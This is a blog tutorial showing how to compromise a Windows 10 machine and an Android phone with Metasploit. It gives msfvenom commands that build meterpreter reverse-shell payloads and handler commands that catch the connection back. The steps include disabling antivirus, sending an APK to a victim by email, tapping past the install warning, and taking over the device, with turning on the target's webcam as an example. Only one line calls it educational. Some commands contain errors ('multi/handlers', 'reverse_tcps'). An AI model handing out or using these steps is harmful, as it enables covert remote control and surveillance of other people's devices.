Windows Exploit using Metasploit

 

•   Hello everyone, this blog is related to exploiting windows system(win-10) using Kali Linux.
• So, basically we need two operating systems, First one is kali(attacker) and second one is Windows(victim).
• This Practical works when both of the machines are in same network.
• So. I have installed Kali-linux and windows-10 in Virtualbox.
• I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network,
• This also works if you have host machine kali and on other side you have windows-10(PC) with you.
• You can also install kali on Virtualbox and set it to NAT network(Bridge is recommended).
• For surety u can ping the windows 10 machine from Kali to check that the machines are on same network or not.

Practical Starts Here :

STEP 1 :- 

Go to the Kali Linux terminal and type the following command as shown below:-

• msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 -f exe > exploit name.exe

 

STEP 2 :-

Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE).

STEP 3 :-

 Now type the following commands as follows:-

• msfconsole
• use exploit/multi/handlers 
• Set payload windows/x64/meterpreter/reverse_tcp
• Set lhost your IP of Kali 
• set lport 8080
• exploit 

STEP 4 :- 

Now click on the exe file from your Target machine .

STEP 5 :- 

Now you can able to see that session is created in Kali Linux .

STEP 6 :- 

Now you have all control to your target machine which is windows machine in our case .

STEP 7 :- 

I have shown you example by opening webcam of target machine .

STEP 8 :- 

You can also use different commands to operate the target machine . To know the different commands type help and you will get all commands listed .

Android Exploitation using Metasploit

 

Hello everyone, this blog is related to exploiting Android using Kali Linux.

Title: Exploiting Android Devices using Kali Linux Introduction: 

In this blog post, we will explore how to exploit Android devices using Kali Linux. We will use Kali Linux's powerful tools and techniques to create a payload, send it to the target device, and gain control over it. Please note that this guide is for educational purposes only, and any unauthorized use of these techniques is strictly prohibited.

Step 1: Generating the Payload Open Terminal or Root Terminal in Kali Linux. Write the following command to generate the payload for Android: 

•  Open Terminal or Root Terminal in Kali-Linux 
• Write the payload for android which is given below 

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Choose a Port> -o android.apk 

Replace <Your IP Address> with your machine's IP address and <Choose a Port> with a port number of your choice (e.g., 4444, 8080).       

Step 2:- Sending and Installing the Payload

• Send the generated APK file (android.apk) to the target Android device using a preferred method (email, file sharing, etc.). 
• On the target device, locate the APK file and install it. You may receive a security warning during installation. Proceed by tapping "Install Anyway." [Include an image of the installation screen]
•  Once installed, the application's icon will appear on the device's home screen.

• Then after installing it and it will ask for permission that shown bellow 

• Then after touch on install Anyway It will look like that shown in the image  [MainActivity]

 Step 3:-

Write commands shown bellow

• Msfconsole 
• use exploit/multi/handlers
• Set payload android/meterpreter/reverse_tcps
• Set lhost <Your IP address> 
• Set lport <which you write in payload>
• run/exploit

  Then after click on mainactivity on android

[It's msfconsole]